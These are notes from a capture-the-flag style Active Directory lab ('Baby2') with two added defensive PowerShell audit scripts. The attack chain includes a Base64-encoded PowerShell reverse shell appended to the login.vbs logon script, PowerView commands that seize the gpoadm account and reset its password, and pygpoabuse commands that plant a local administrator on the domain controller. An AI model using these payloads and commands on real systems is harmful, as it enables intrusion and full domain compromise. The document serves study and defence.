Baby2
This is not a writeup, just my notes about the machine.
Machine information

Operating System: Windows
Chain: False
Credentials
Username     Password     Found via        Role
Carl.Moore   Carl.Moore   rid-bruteforce   domain user
office       office       rid-bruteforce   domain user
✅ Valid Usernames
gpoadm
office
Joan.Jennings
Mohammed.Harris
Harry.Shaw
Carl.Moore
Ryan.Jenkins
Kieran.Mitchell
Nicola.Lamb
Lynda.Bailey
Joel.Hurst
Amelia.Griffiths
library
legacy
🔑 Passwords list
Information Gathering
# Nmap 7.94SVN scan initiated Thu Apr 3 20:49:16 2025 as: nmap -sS -p- -A --open -T5 -Pn -n -oN ext_baby2_tcp_allports -vvv 10.10.68.84
53/tcp open domain syn-ack ttl 127 Simple DNS Plus
88/tcp open kerberos-sec syn-ack ttl 127 Microsoft Windows Kerberos (server time: 2025-04-04 00:54:42Z)
135/tcp open msrpc syn-ack ttl 127 Microsoft Windows RPC
139/tcp open netbios-ssn syn-ack ttl 127 Microsoft Windows netbios-ssn
389/tcp open ldap syn-ack ttl 127 Microsoft Windows Active Directory LDAP (Domain: baby2.vl0., Site: Default-First-Site-Name)
445/tcp open microsoft-ds? syn-ack ttl 127
464/tcp open kpasswd5? syn-ack ttl 127
593/tcp open ncacn_http syn-ack ttl 127 Microsoft Windows RPC over HTTP 1.0
636/tcp open ssl/ldap syn-ack ttl 127 Microsoft Windows Active Directory LDAP (Domain: baby2.vl0., Site: Default-First-Site-Name)
3389/tcp open ms-wbt-server syn-ack ttl 127 Microsoft Terminal Services
49668/tcp open msrpc syn-ack ttl 127 Microsoft Windows RPC
49674/tcp open ncacn_http syn-ack ttl 127 Microsoft Windows RPC over HTTP 1.0
49676/tcp open msrpc syn-ack ttl 127 Microsoft Windows RPC
51163/tcp open msrpc syn-ack ttl 127 Microsoft Windows RPC
51168/tcp open msrpc syn-ack ttl 127 Microsoft Windows RPC
51183/tcp open msrpc syn-ack ttl 127 Microsoft Windows RPC
51198/tcp open msrpc syn-ack ttl 127 Microsoft Windows RPC
Service Enumeration
DNS
Not vulnerable to DNS Zone Transfer
SMB (enum4linux-ng)
Server allows null session.
Server allows guest user access.
Read/write access to the homes directory.
Username-as-password brute forcing revealed Carl.Moore and office as valid credentials. These accounts can read and write in apps, docs and homes.
LDAP
Allows user enumeration via RID brute forcing (RID cycling itself goes over SAMR/LSARPC on the MSRPC/SMB side rather than through LDAP).
No Kerberoastable users.
No AS-REP roastable users.
No information within the users' description field.
Initial enumeration
During the assessment, the tester discovered that the domain user Carl.Moore has read and write access to the following SMB shares:
\\DC\apps
\\DC\docs
\\DC\homes
In addition, nxc reports only READ for the NETLOGON and SYSVOL shares:
nxc smb 10.10.68.84 -u Carl.Moore -p 'Carl.Moore' --shares
SMB 10.10.68.84 445 DC [*] Windows Server 2022 Build 20348 x64 (name:DC) (domain:baby2.vl) (signing:True) (SMBv1:False)
SMB 10.10.68.84 445 DC [+] baby2.vl\Carl.Moore:Carl.Moore
SMB 10.10.68.84 445 DC [*] Enumerated shares
SMB 10.10.68.84 445 DC Share Permissions Remark
SMB 10.10.68.84 445 DC ----- ----------- ------
SMB 10.10.68.84 445 DC ADMIN$ Remote Admin
SMB 10.10.68.84 445 DC apps READ,WRITE
SMB 10.10.68.84 445 DC C$ Default share
SMB 10.10.68.84 445 DC docs READ,WRITE
SMB 10.10.68.84 445 DC homes READ,WRITE
SMB 10.10.68.84 445 DC IPC$ READ Remote IPC
SMB 10.10.68.84 445 DC NETLOGON READ Logon server share
SMB 10.10.68.84 445 DC SYSVOL READ Logon server share
However, further enumeration revealed that the user has write access at the NTFS level to the following file:
\\baby2.vl\SYSVOL\baby2.vl\scripts\login.vbs
The READ that nxc shows for SYSVOL is not a share-level ACL: nxc probes each share root by listing it and trying to create a directory there, so a single writable file deeper in the tree never shows up in that column. The NTFS DACLs of the scripts under SYSVOL\<domain>\scripts (the folder behind the NETLOGON share) have to be checked file by file.
This file is executed by domain users during the logon process (as confirmed via BloodHound enumeration or logon script analysis). That makes it a high-impact attack vector: an unprivileged domain user can modify login.vbs to execute arbitrary code in the context of every user who runs it at logon, potentially including privileged accounts such as domain administrators.
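A per-file check for this class of problem, added here as an example (it is not part of the original notes): it walks the scripts folder behind NETLOGON, reports every file that a non-administrative principal owns or can write, and lists the accounts whose scriptPath points at that file, flagging adminCount=1 (protected, admin-tier) accounts. The domain name, the trusted-principal list and the path are assumptions to adjust; it needs no RSAT and runs as a plain domain user from any domain-joined host.

```powershell
# Added example (not from the original notes): find logon scripts under the
# NETLOGON folder of SYSVOL that a non-administrative principal can modify, and
# list the accounts whose scriptPath points at each of them. nxc's READ/WRITE
# column only probes the share root, which is why this per-file check is needed.
# $Domain and $ScriptRoot are assumptions for the lab in the notes.
function Get-WritableLogonScript {
    param(
        [string]$Domain = 'baby2.vl',
        # NETLOGON is a share of SYSVOL\<domain>\scripts on every DC
        [string]$ScriptRoot = "\\$Domain\SYSVOL\$Domain\scripts"
    )

    # Identities that are supposed to be able to write SYSVOL. Anything else
    # holding a write right (or owning the file) is reported. Adjust as needed.
    $trusted = '^(NT AUTHORITY\\SYSTEM|BUILTIN\\Administrators|BUILTIN\\Server Operators|CREATOR OWNER|.+\\(Domain Admins|Enterprise Admins|Domain Controllers))$'

    # Any of these bits lets the holder change the script or its DACL. The two
    # hex values are GENERIC_WRITE and GENERIC_ALL, which Get-Acl returns raw.
    $writeMask = [int][System.Security.AccessControl.FileSystemRights]'WriteData, AppendData, WriteAttributes, WriteExtendedAttributes, Delete, ChangePermissions, TakeOwnership'
    $writeMask = $writeMask -bor 0x40000000 -bor 0x10000000

    # scriptPath -> accounts that run it at logon. adminCount=1 marks protected
    # (admin-tier) accounts, the high-value victims of a tampered script.
    $searcher = [adsisearcher]'(&(objectCategory=person)(objectClass=user)(scriptPath=*))'
    $searcher.PageSize = 1000
    $null = $searcher.PropertiesToLoad.AddRange([string[]]@('samaccountname', 'scriptpath', 'admincount'))
    $runners = @{}
    foreach ($r in $searcher.FindAll()) {
        # scriptPath is relative to NETLOGON, e.g. "login.vbs"; key on the file name
        $name = [System.IO.Path]::GetFileName([string]$r.Properties['scriptpath'][0]).ToLowerInvariant()
        $acct = [string]$r.Properties['samaccountname'][0]
        if ($r.Properties['admincount'].Count -gt 0 -and [int]$r.Properties['admincount'][0] -eq 1) {
            $acct += ' (adminCount=1)'
        }
        if (-not $runners.ContainsKey($name)) { $runners[$name] = New-Object System.Collections.Generic.List[string] }
        $runners[$name].Add($acct)
    }

    foreach ($file in Get-ChildItem -LiteralPath $ScriptRoot -File -Recurse -ErrorAction Stop) {
        $acl = Get-Acl -LiteralPath $file.FullName
        $key = $file.Name.ToLowerInvariant()
        $who = if ($runners.ContainsKey($key)) { $runners[$key] -join ', ' } else { '(no scriptPath references it)' }

        # The owner can rewrite the DACL even without an explicit write ACE.
        if ($acl.Owner -notmatch $trusted) {
            [pscustomobject]@{ Script = $file.FullName; Principal = $acl.Owner; Rights = 'Owner'; Inherited = $false; RunBy = $who }
        }
        # Deny ACEs are not evaluated here; for exact effective access compare
        # against the deny entries or test with the account in question.
        foreach ($ace in $acl.Access) {
            if ($ace.AccessControlType -ne 'Allow') { continue }
            if ($ace.IdentityReference.Value -match $trusted) { continue }
            if (([int]$ace.FileSystemRights -band $writeMask) -eq 0) { continue }
            [pscustomobject]@{
                Script    = $file.FullName
                Principal = $ace.IdentityReference.Value
                Rights    = $ace.FileSystemRights
                Inherited = $ace.IsInherited
                RunBy     = $who
            }
        }
    }
}

Get-WritableLogonScript | Format-Table -AutoSize -Wrap
```

Get-Acl over the UNC path reads the NTFS DACL stored on the DC, which is exactly the layer the share-root probe misses. A hit whose RunBy column contains an adminCount=1 account is the login.vbs situation from these notes.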
Reverse Shell via Logon Script
To exploit this misconfiguration, the tester appended the following lines to the script. The -e argument is a Base64-encoded (UTF-16LE) PowerShell TCP reverse shell that connects back to the tester's listener:
' Launch PowerShell with the encoded reverse shell (the -e payload is the
' Base64/UTF-16LE encoding of a TCP reverse shell one-liner)
Set objShell = CreateObject("Wscript.Shell")
objShell.Run "powershell -e JABjAGwAaQBlAG4AdAAgAD0AIABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFMAbwBjAGsAZQB0AHMALgBUAEMAUABDAGwAaQBlAG4AdAAoACIAMQAwAC4AOAAuADUALgA0ADgAIgAsADEAMgAzADQAKQA7ACQAcwB0AHIAZQBhAG0AIAA9ACAAJABjAGwAaQBlAG4AdAAuAEcAZQB0AFMAdAByAGUAYQBtACgAKQA7AFsAYgB5AHQAZQBbAF0AXQAkAGIAeQB0AGUAcwAgAD0AIAAwAC4ALgA2ADUANQAzADUAfAAlAHsAMAB9ADsAdwBoAGkAbABlACgAKAAkAGkAIAA9ACAAJABzAHQAcgBlAGEAbQAuAFIAZQBhAGQAKAAkAGIAeQB0AGUAcwAsACAAMAAsACAAJABiAHkAdABlAHMALgBMAGUAbgBnAHQAaAApACkAIAAtAG4AZQAgADAAKQB7ADsAJABkAGEAdABhACAAPQAgACgATgBlAHcALQBPAGIAagBlAGMAdAAgAC0AVAB5AHAAZQBOAGEAbQBlACAAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4AQQBTAEMASQBJAEUAbgBjAG8AZABpAG4AZwApAC4ARwBlAHQAUwB0AHIAaQBuAGcAKAAkAGIAeQB0AGUAcwAsADAALAAgACQAaQApADsAJABzAGUAbgBkAGIAYQBjAGsAIAA9ACAAKABpAGUAeAAgACQAZABhAHQAYQAgADIAPgAmADEAIAB8ACAATwB1AHQALQBTAHQAcgBpAG4AZwAgACkAOwAkAHMAZQBuAGQAYgBhAGMAawAyACAAPQAgACQAcwBlAG4AZABiAGEAYwBrACAAKwAgACIAUABTACAAIgAgACsAIAAoAHAAdwBkACkALgBQAGEAdABoACAAKwAgACIAPgAgACIAOwAkAHMAZQBuAGQAYgB5AHQAZQAgAD0AIAAoAFsAdABlAHgAdAAuAGUAbgBjAG8AZABpAG4AZwBdADoAOgBBAFMAQwBJAEkAKQAuAEcAZQB0AEIAeQB0AGUAcwAoACQAcwBlAG4AZABiAGEAYwBrADIAKQA7ACQAcwB0AHIAZQBhAG0ALgBXAHIAaQB0AGUAKAAkAHMAZQBuAGQAYgB5AHQAZQAsADAALAAkAHMAZQBuAGQAYgB5AHQAZQAuAEwAZQBuAGcAdABoACkAOwAkAHMAdAByAGUAYQBtAC4ARgBsAHUAcwBoACgAKQB9ADsAJABjAGwAaQBlAG4AdAAuAEMAbABvAHMAZQAoACkA"
Finally, the tester overwrote the original file with the modified login.vbs over SMB and waited for the reverse shell:
smb: \baby2.vl\scripts\> put login.vbs
putting file login.vbs as \baby2.vl\scripts\login.vbs (4.7 kb/s) (average 4.7 kb/s)

Lateral movement from Amelia.Griffiths to gpoadm
During post-compromise enumeration, the tester identified that the user Amelia.Griffiths held the following Active Directory permissions over the gpoadm user object:
WriteOwner
WriteDACL
Either right is enough on its own to take over the object: WriteOwner lets the attacker become the owner, and an owner can always rewrite the DACL; WriteDACL lets them grant themselves GenericAll directly. The tester used both to take full control of gpoadm and reset its password, achieving lateral movement. A password reset locks out the legitimate user and logs event 4724 on the DC; where stealth matters, GenericAll on the same object also allows quieter options such as a targeted Kerberoast (adding an SPN) or shadow credentials (msDS-KeyCredentialLink).

PS C:\temp> Import-Module .\PowerView.ps1
PS C:\temp> Set-DomainObjectOwner -Identity gpoadm -OwnerIdentity Amelia.Griffiths -Verbose
PS C:\temp> Add-DomainObjectAcl -TargetIdentity gpoadm -PrincipalIdentity Amelia.Griffiths -Rights All -Verbose
PS C:\temp> Set-DomainUserPassword -Identity gpoadm -AccountPassword (ConvertTo-SecureString 'Password1!' -AsPlainText -Force) -Verbose
Compromise Domain Controller
At this point the tester had compromised an account with administrative rights over a GPO that applies to the Domain Controller: the GUID used below, 6AC1786C-016F-11D2-945F-00C04FB984F9, is the Default Domain Controllers Policy, which is linked to the Domain Controllers OU. Whoever can edit that GPO gets code execution as SYSTEM on the DC, which means domain compromise.

The tester leveraged this with pygpoabuse.py, which adds an immediate scheduled task to the GPO (written to the policy's Machine\Preferences\ScheduledTasks\ScheduledTasks.xml under SYSVOL, with the GPO version bumped so clients pick it up). Run without -command, the tool's default task creates a local user john with password H4x00r123.. and adds it to the Administrators group on the machines the GPO applies to, here the Domain Controller.
# Obtain the GPO ID (GroupPolicy module)
PS C:\temp> Get-GPO -all
# GPO abuse tool, run from the attacker host as gpoadm against the Default Domain Controllers Policy
❯ python3 pygpoabuse.py baby2.vl/gpoadm:'Password1!' -dc-ip 10.10.68.84 -gpo-id '6ac1786c-016f-11d2-945f-00c04fb984f9'
SUCCESS:root:ScheduledTask TASK_5cdfc77f created!
[+] ScheduledTask TASK_5cdfc77f created!
# Force a group policy refresh on the DC so the scheduled task runs now rather than at the next cycle (every 5 minutes on DCs by default)
PS C:\temp> Gpupdate /force
The tester then authenticated as john, now a member of the Domain Controller's Administrators group, and nxc confirmed administrative access (Pwn3d!):
❯ nxc smb 10.10.68.84 -u 'john' -p 'H4x00r123..'
SMB 10.10.68.84 445 DC [*] Windows Server 2022 Build 20348 x64 (name:DC) (domain:baby2.vl) (signing:True) (SMBv1:False)
SMB 10.10.68.84 445 DC [+] baby2.vl\john:H4x00r123.. (Pwn3d!)
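Both ACL weaknesses used above (Amelia.Griffiths holding WriteOwner/WriteDACL over gpoadm, and gpoadm being able to edit a GPO linked to the Domain Controllers OU) can be found from the defender's side with one ACE audit. The following is an added example, not part of the original notes or of PowerView/pygpoabuse: it lists every Allow ACE on an AD object that grants control rights to a principal outside the usual administrative set, runs it against the gpoadm user object and against every groupPolicyContainer, and prints the gPLink of the Domain Controllers OU so the GPOs that reach the DC can be matched up. It uses only System.DirectoryServices, so it works from any domain-joined PowerShell without RSAT; the account name comes from the notes, the trusted-principal list is an assumption to adjust.

```powershell
# Added example (not part of the original notes): list ACEs on AD objects that
# hand control of the object to a principal outside the administrative set.
function Get-ControlAce {
    param([Parameter(Mandatory)][string]$DistinguishedName)

    $entry = [ADSI]"LDAP://$DistinguishedName"
    # Explicit and inherited rules, identities resolved to DOMAIN\name form
    $rules = $entry.ObjectSecurity.GetAccessRules($true, $true, [System.Security.Principal.NTAccount])

    # Rights that allow taking over or rewriting the object outright.
    $control = [System.DirectoryServices.ActiveDirectoryRights]'WriteOwner, WriteDacl, GenericAll, GenericWrite, WriteProperty'
    # User-Force-Change-Password control access right (reset without the old password).
    $forceChangePassword = [guid]'00299570-246d-11d0-a768-00aa006e0529'
    # Principals expected to control objects; adjust for your forest.
    $trusted = '^(NT AUTHORITY\\(SYSTEM|SELF)|BUILTIN\\Administrators|.+\\(Domain Admins|Enterprise Admins|Domain Controllers|Enterprise Domain Controllers|Group Policy Creator Owners|Key Admins|Enterprise Key Admins))$'

    foreach ($ace in $rules) {
        if ($ace.AccessControlType -ne 'Allow') { continue }
        if ($ace.IdentityReference.Value -match $trusted) { continue }

        $hasControl = ([int]($ace.ActiveDirectoryRights -band $control)) -ne 0
        $hasForceChange = ([int]($ace.ActiveDirectoryRights -band [System.DirectoryServices.ActiveDirectoryRights]::ExtendedRight)) -ne 0 -and
                          ($ace.ObjectType -eq [guid]::Empty -or $ace.ObjectType -eq $forceChangePassword)
        if (-not ($hasControl -or $hasForceChange)) { continue }

        # An empty ObjectType GUID means the right covers the whole object; a
        # specific GUID limits WriteProperty/ExtendedRight to one attribute or
        # control access right and needs a schema lookup to judge.
        $scope = if ($ace.ObjectType -eq [guid]::Empty) { 'whole object' } else { $ace.ObjectType.ToString() }
        [pscustomobject]@{
            Object     = $DistinguishedName
            Principal  = $ace.IdentityReference.Value
            Rights     = $ace.ActiveDirectoryRights
            ObjectType = $scope
            Inherited  = $ace.IsInherited
        }
    }
}

function Find-Dn {
    param([Parameter(Mandatory)][string]$LdapFilter)
    $searcher = [adsisearcher]$LdapFilter
    $searcher.PageSize = 1000
    $null = $searcher.PropertiesToLoad.Add('distinguishedname')
    foreach ($r in $searcher.FindAll()) { [string]$r.Properties['distinguishedname'][0] }
}

# (a) who can take over the gpoadm account (expect Amelia.Griffiths with WriteOwner, WriteDacl)
Find-Dn '(&(objectClass=user)(sAMAccountName=gpoadm))' | ForEach-Object { Get-ControlAce $_ }

# (b) which GPOs apply to the DCs (gPLink on the Domain Controllers OU) and who
# can edit any GPO. CN={6AC1786C-016F-11D2-945F-00C04FB984F9} is the Default
# Domain Controllers Policy abused in the notes.
$nc = ([ADSI]'LDAP://RootDSE').Properties['defaultNamingContext'].Value
([ADSI]"LDAP://OU=Domain Controllers,$nc").Properties['gPLink'].Value
Find-Dn '(objectClass=groupPolicyContainer)' | ForEach-Object { Get-ControlAce $_ } | Format-Table -AutoSize -Wrap
```

A GPO's SYSVOL folder (Policies\{GUID}) carries an NTFS ACL mirroring the AD object's, so a principal flagged on a groupPolicyContainer can also drop files such as Machine\Preferences\ScheduledTasks\ScheduledTasks.xml, which is what pygpoabuse relies on. For detection, watch for writes under Policies\*\Machine\Preferences\ScheduledTasks and for versionNumber or gPCMachineExtensionNames changes on groupPolicyContainer objects made by accounts that are not in the GPO-editing group.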